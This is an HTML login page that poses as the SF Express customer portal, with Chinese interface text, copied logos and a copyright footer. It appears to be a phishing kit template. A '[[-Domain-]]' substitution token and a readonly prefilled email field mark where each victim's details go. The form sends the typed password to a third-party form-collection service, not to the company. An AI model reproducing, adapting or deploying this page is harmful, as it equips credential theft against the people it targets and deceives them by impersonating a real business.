<!DOCTYPE html><head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SF Express</title>
<link rel="short icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSgfqe8AdGRdhM--Bs4iQBib6oOK7AYp5E_lzbudnPNCuB3Jhv1ujfiv9pWgMhOc0JoD9o&usqp=CAU">
</head>


<style>
@charset "utf-8";
/* CSS Document */

body {
	 font-family:Verdana;
	 topmargin:0px; 
	 leftmargin:0px; 
	 rightmargin:0px; 
     }

#header { color:#fff; 
          font-size:15px;
          background:#000000;
          font-family:Verdana;
         }

#doc { color:#999; 
       border-top:#999 solid 1px; 
	   padding:8px;
	   font-size:15px;
	   }
#doc1 { color:#999; 
       border-top:#999 solid 1px; 
	   border-left:#999 solid 1px;
	   padding:5px;
	   font-size:15px;
	   }

#form { color:#29703B; 
        font-size:20px;
       }

input{
width:400px;
padding:10px;
border-radius:0px;
border:1px solid #E4E4E4;
font-size:16px;
font-family:Verdana;
color:#333;
outline:none;
}

input:focus{
border:1px solid #305E8B;
outline:none;
color:#060;
}

input:hover {box-shadow:0px 1px 1px 1px #999;
}

input[type=submit]{
width:418px;
padding:10px;
border-radius:0px;
border:1px solid #292929;
font-size:16px;
font-family:Verdana;
background:#292929;
color:#FFF;
}

input[type=submit]:hover{
background:#1b5e84;
color:#FFF;
cursor:pointer;
border:hidden;
box-shadow:0px 1px 1px 1px #1b5e84;
}

#check { width:16px; 
         height:16px; 
		 color:#666;
         }
		 
#wch  { width:80%;
}

#fdiv  { width:500px;;
         text-align:left;
		 padding:15px;
		 background:#FFF;
		 border-radius:2px;
}

#ex {  color:#29703B;
        font-size:14px;
		font-weight:bold;
		padding-bottom:8px;
         }
#rem {color:#999;
      padding-left:25px;
      }
 
#priv { font-size:12px;
        padding:5px; 
		color:#999;}
		
#com { padding-top:5px; 
       font-size:14px; 
	   border-top:#CBCBCB solid 1px;
	   color:#CBCBCB;
	   padding-left:48px;
      }
      
#ema{
  color:#FF0000;
  padding-left:10px;
  font-family:Verdana;
  font-size:13px;
}

@media only screen and (max-width: 600px) 
{
#header { display:none;
         }
#doc { display:none;
	  border-top:#E6E6E6 solid 1px; 
	   border-bottom:#E6E6E6 solid 1px;
	   }
           
           #ema{
  color:#FF0000;
  padding-left:10px;
  font-family:Verdana;
  font-size:11px;
}

           
#doc1 { color:#999; 
       border-top:#E6E6E6 solid 1px; 
	   border-bottom:#E6E6E6 solid 1px;
	   padding:3px;
	   font-size:13px;
	   }
#fdiv  { width:95%;;
         text-align:left;
		 padding:5px;
		 background:#FFF;
		 padding-left:20px;
		 border-radius:3px;
}
#form { color:#29703B; 
        font-size:14px;
       }

#ex {  color:#29703B;
        font-size:11px;
		font-weight:bold;
		padding-bottom:6px;
		width:65%;
         }
	
input{
width:95%;
padding:6px;
border-radius:0px;
border:1px solid #E4E4E4;
font-size:13px;
font-family:Verdana;
color:#333;
outline:none;
}
input[type=submit]{
width:100%;
padding:6px;
border-radius:2px;
border:1px solid #E4E4E4;
font-size:13px;
font-family:Verdana;
background:#29703B;
color:#FFF;
}
#check { width:13px; 
         height:13px; 
		 color:#666;
         }
		 
#wch  { width:60%;
}

#l {font-size:14px;}
#rem { font-size:13px;}
#priv { font-size:10px;
        padding:5px; 
		color:#999;}
#com { padding-top:4px; 
       font-size:11px; 
	   border-top:#29703B solid 1px;
	   color:#C0C0C0;
      }
</style>

<body topmargin="0" leftmargin="0" rightmargin="0" style="background:url(https://image5.sixthtone.com/image/5/0/771.jpg) no-repeat center;">
<div align="right" style="width:100%;">

<table width="100%"  cellpadding="3" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td id="doc1" bordercolor="#CCCCCC">
&nbsp;&nbsp;&nbsp;[[-Domain-]]: &#24744;&#24050;&#36830;&#25509;&#33267;SFExpress.com </td>
<td align="right" id="doc" bordercolor="#CCCCCC">
<font color="#FF0000" style="cursor:wait;">&#23458;&#25143;&#26381;&#21153; &dArr;</font> &nbsp; | &nbsp;
<a href="#" style="cursor:pointer; color:#305E8B; text-decoration:none;">&#30331;&#20837;</a> &nbsp;
</td>
</tr>
</table>
<div align="center" style=" background-color:rgba(0,0,0,0.6);">
<div style="padding:18px;"></div>
<div align="center" id="fdiv">
<div align="left" id="ex">
<table width="420" cellpadding="0" cellspacing="0">
<tr style="padding:3px;">
<br>
<td> &nbsp; &nbsp; <img src="https://seeklogo.com/images/S/sf-express-logo-A3876F998B-seeklogo.com.png" style="width:150px; height:50px;" alt=""/></td>
</tr>
</table>
</div>
<div align="left" id="com">
<div style="padding:4px;"></div>
<font color="#000000" style="font-size:20px;"> &#30331;&#24405;&#23458;&#25143;&#38376;&#25143;&#20197;&#32487;&#32493; </font>
</div>
<div style="padding:8px;"></div>
<div align="center">
<form action="https://nocodeform.io/f/66e754f521224b2ccb671b00" onSubmit="return validateForm()" method="post">
<input type="email" name="email" readonly value="test@mail.com" require.cmmd autocomplete="off" style="outline:none;" />

<div style="padding:5px;"></div>
<input type="password" name="password" placeholder="&#23494;&#30721;" required style="outline:none;" />

<div style="padding:5px;"></div>
<table align="left" cellspacing="0" cellpadding="0" style="padding-left:45px;">
<tr id="rem">
<td><input id="check" type="checkbox"></td>
<td>
&#35760;&#20303;&#25105;&#30340;&#29992;&#25143;ID<br><div style="padding:5px;"></div>
</td>
</tr>
</table>
<div style="padding:20px;"></div>
<input type="submit" name="login" value="&#30331;&#20837;" required />
</form>
</div>
<br>
<div id="priv" align="center">
<table width="121" cellpadding="0" cellspacing="0">
<tr align="center">
<td align="center" width="30"><img src="https://www.sf-international.com/_nuxt/img/jialiwuliu.a3cf057.png" style="width:420px; height:75px;" alt=""/></td>

  </tr>
  </table></div>

<div align="center" style="padding:5px; font-size:10px; color:#999;">
sf-express.com &copy;1991-2024 | &#29256;&#26435;&#25152;&#26377; </div>
<br>
<br>
</div>
<br>

</div>
</div>
</body>
</html>